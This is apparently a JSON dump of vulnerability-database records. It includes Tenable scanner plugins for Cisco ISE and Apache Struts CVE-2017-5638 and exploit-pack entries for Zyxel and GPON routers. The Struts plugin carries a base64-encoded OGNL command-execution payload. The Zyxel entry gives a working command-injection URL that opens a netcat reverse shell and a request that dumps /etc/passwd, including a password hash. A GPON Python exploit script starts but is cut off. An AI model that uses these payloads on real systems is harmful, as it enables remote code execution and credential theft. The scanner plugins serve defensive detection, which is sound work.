script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Identity Services Engine Software\");\n\nvuln_ranges = [\n { 'min_ver' : '2.0.0.0', 'fix_ver' : '2.0.0.306' },\n { 'min_ver' : '2.0.1.0', 'fix_ver' : '2.0.1.130' },\n { 'min_ver' : '2.1.0.0', 'fix_ver' : '2.1.0.474' },\n { 'min_ver' : '2.2.0.0', 'fix_ver' : '2.2.0.470' },\n { 'min_ver' : '2.3.0.0', 'fix_ver' : '2.3.0.298' },\n { 'min_ver' : '2.4.0.0', 'fix_ver' : '2.4.0.357' }\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\n# ISE version doesn't change when patches are installed, so even if\n# they are on the proper version we have to double check patch level\nrequired_patch = '';\nif (product_info['version'] =~ \"^2\\.4\\.0($|[^0-9])\") required_patch = '2';\nif (product_info['version'] =~ \"^2\\.3\\.0($|[^0-9])\") required_patch = '4';\nif (product_info['version'] =~ \"^2\\.2\\.0($|[^0-9])\") required_patch = '9';\nelse if (product_info['version'] =~ \"^2\\.1\\.0($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0\\.1($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0($|[^0-9])\") required_patch = '7';\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14030\",\n 'fix' , 'See advisory'\n);\n\n# uses required_patch parameters set by above version ranges\ncisco::check_and_report(product_info:product_info, reporting:reporting, workarounds:workarounds, workaround_params:workaround_params, vuln_ranges:vuln_ranges, required_patch:required_patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:51", "description": "The remote web server is being targeted by an Apache Struts 2 exploitation attempt. Versions of Apache Struts 2.5.x prior to 2.5.10.1 and 2.3.x prior to 2.3.32 are affected by a flaw that is triggered when handling invalid Content-Type, Content-Disposition, or Content-Length values for uploaded files using the Jakarta Multipart parser. This may allow a remote attacker to potentially execute arbitrary code.", "cvss3": {}, "published": "2017-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2 RCE (CVE-2017-5638) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "700055.PRM", "href": "https://www.tenable.com/plugins/nnm/700055", "sourceData": "Binary data 700055.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:08:36", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"min_version\" : \"2.3.5\", \"max_version\" : \"2.3.31\", \"fixed_version\" : \"2.3.32\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.10\", \"fixed_version\" : \"2.5.10.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:06:06", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/97610", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97610);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the Jakarta Multipart parser\ndue to improper handling of the Content-Type header. An\nunauthenticated, remote attacker can exploit this, via a specially\ncrafted Content-Type header value in the HTTP request, to potentially\nexecute arbitrary code, subject to the privileges of the web server\nuser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.\nAlternatively, apply the workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list('/');\n\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nurls = list_uniq(urls);\n\nvuln = FALSE;\n\nrand_var = rand_str(length:8);\nheader_payload = \"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','\" + rand_var + \"')}.multipart/form-data\";\nheaders_1 = make_array(\"Content-Type\", header_payload);\n\n# The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV\n# vendors.\n# {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'}))\nexploit = \"JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX\";\nexploit += \"h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ\";\nexploit += \"lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w\";\nexploit += \"aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb\";\nexploit += \"D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi\";\nexploit += \"5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t\";\nexploit += \"hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz\";\nexploit += \"KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja\";\nexploit += \"XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG\";\nexploit += \"9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N\";\nexploit += \"tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn\";\nexploit += \"fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL\";\nexploit += \"nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS\";\nexploit += \"4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB\";\nexploit += \"nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv\";\nexploit += \"bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI\";\nexploit += \"3JvcykpLigjcm9zLmZsdXNoKCkpfQo=\";\n\nheaders_2 = make_array(\"Content-Type\", chomp(base64_decode(str:exploit)));\n\n# Since struts apps could be taking longer\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nforeach url (urls)\n{\n ############################################\n # Method 1\n ############################################\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_1,\n exit_on_fail : TRUE\n );\n if ( (\"X-Tenable: \"+ rand_var ) >< res[1] )\n vuln = TRUE;\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n\n ############################################\n # Method 2\n ############################################\n\n cmd_pats = make_array();\n cmd_pats['id'] = \"uid=[0-9]+.*\\sgid=[0-9]+.*\";\n cmd_pats['ipconfig'] = \"Subnet Mask|Windows IP|IP(v(4|6)?)? Address\";\n\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n add_headers : headers_2,\n exit_on_fail : TRUE\n );\n\n if (\"Windows IP\" >< res[2] || \"uid\" >< res[2])\n {\n if (pgrep(pattern:cmd_pats['id'], string:res[2]))\n {\n output = strstr(res[2], \"uid\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2]))\n {\n output = strstr(res[2], \"Windows IP\");\n if (!empty_or_null(output))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:url, port:port);\n break;\n }\n }\n }\n}\n\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-26T15:26:42", "description": "An issue was discovered in GPON ONT Home Gateway web administration interface. A remote command execution vulnerability exists in /GponForm/device_Form?script/ component due to insufficient input validation. An authenticated, remote attacker can exploit this to escalate their permissions level and execute arbitrary commands with root privileges.\n\nNote that Nessus has authenticated to GPON Home Gateway web interface by using supplied credentials or utilized an authentication bypass (CVE-2018-10561) issue in order to exploit this vulnerability.", "cvss3": {}, "published": "2019-03-28T00:00:00", "type": "nessus", "title": "GPON ONT Home Gateway Authenticated Remote Command Execution (CVE-2019-3920)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2019-3920"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:dasannetworks:gpon_router"], "id": "GPON_CVE-2019-3920.NBIN", "href": "https://www.tenable.com/plugins/nessus/123419", "sourceData": "Binary data gpon_cve-2019-3920.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-29T14:52:23", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2017-5638, a code execution vulnerability in Apache Struts (S2-045). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2017-5638)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2023-07-17T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/141576", "sourceData": "Binary data selligent_message_studio_rce.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-26T15:26:59", "description": "An issue was discovered in GPON ONT Home Gateway Router web administration interface. A remote command execution vulnerability exists in /GponForm/usb_restore_Form?script/ component due to insufficient input validation. An authenticated, remote attacker can exploit this to escalate their permissions level and execute arbitrary commands with root privileges.\n Note that Nessus has authenticated to GPON Home Gateway web interface by using supplied credentials or utilized an authentication bypass (CVE-2018-10561) issue in order to exploit this vulnerability.", "cvss3": {}, "published": "2019-03-25T00:00:00", "type": "nessus", "title": "GPON ONT Home Gateway Authenticated Remote Command Execution (CVE-2019-3919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2019-3919"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:dasannetworks:gpon_router"], "id": "GPON_CVE-2019-3919.NBIN", "href": "https://www.tenable.com/plugins/nessus/123013", "sourceData": "Binary data gpon_cve-2019-3919.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:47", "description": "\nZyxel_ EMG2926 V1.00(AAQT.4)b8 - OS Command Injection", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-02T00:00:00", "type": "exploitpack", "title": "Zyxel_ EMG2926 V1.00(AAQT.4)b8 - OS Command Injection", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6884"], "modified": "2017-04-02T00:00:00", "id": "EXPLOITPACK:2F1C07ED066A254E4CE23468DEBAAEBA", "href": "", "sourceData": "# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection\n# Date: 2017-04-02\n# Exploit Author: Fluffy Huffy (trevor Hough)\n# Vendor Homepage: www.zyxel.com\n# Version: EMG2926 - V1.00(AAQT.4)b8\n# Tested on: linux\n# CVE : CVE-2017-6884\n\nOS command injection vulnerability was discovered in a commonly used\nhome router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools\nspecify the nslookup function. A malicious user may exploit numerous\nvectors to execute arbitrary commands on the router.\n\nExploit (Reverse Shell)\nhttps://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&\nping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p\n\nExploit (Dump Password File)\nRequest\nGET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1\nHost: 192.168.0.1\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nReferer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup\nAccept-Language: en-US,en;q=0.8\nCookie: csd=9; sysauth=<Clipped>\nConnection: close\n\nResponse (Clipped)\n<textarea cols=\"80\" rows=\"15\" readonly=\"true\">root:x:0:0:root:/root:/bin/ash\ndaemon:*:1:1:daemon:/var:/bin/false\nftp:*:55:55:ftp:/home/ftp:/bin/false\nnetwork:*:101:101:network:/var:/bin/false\nnobody:*:65534:65534:nobody:/var:/bin/false\nsupervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash\nadmin:$1$<Clipped>:0:0:admin:/:/bin/fail", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:02", "description": "\nAlcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-28T00:00:00", "type": "exploitpack", "title": "Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561"], "modified": "2019-02-28T00:00:00", "id": "EXPLOITPACK:C890361C9DA2FA0264352384567E504E", "href": "", "sourceData": "#!/usr/bin/python3\n\n\nimport argparse\nimport requests\nimport urllib.parse\nimport binascii\nimport re\n\n\ndef run(target):\n \"\"\" Execute exploitation \"\"\"\n # We're using CVE-2018-10561 and/or it's extension in order to exploit this \n # Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this \n # issue after successful authentication: \"useradmin\" permission is enough\n #\n # IP Spoofing. Perspective option here too\n #\n\n # Step 1. Just a request to adjust stack for the exploit to work\n #\n # POST /GponForm/device_Form?script/ HTTP/1.1\n # Host: 192.168.1.1\n # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\n # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n # Accept-Language: en-US,en;q=0.5\n # Accept-Encoding: gzip, deflate\n # Referer: http://192.168.1.1/device.html\n # Content-Type: application/x-www-form-urlencoded\n # Content-Length: 55\n # Connection: close\n # Upgrade-Insecure-Requests: 1\n #\n # XWebPageName=device&admin_action=usb_enable&usbenable=1\n\n headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',\n 'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded',\n 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}\n payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1}\n try:\n requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2)\n except:\n pass\n\n # Step 2. Actual Exploitation\n #\n # POST 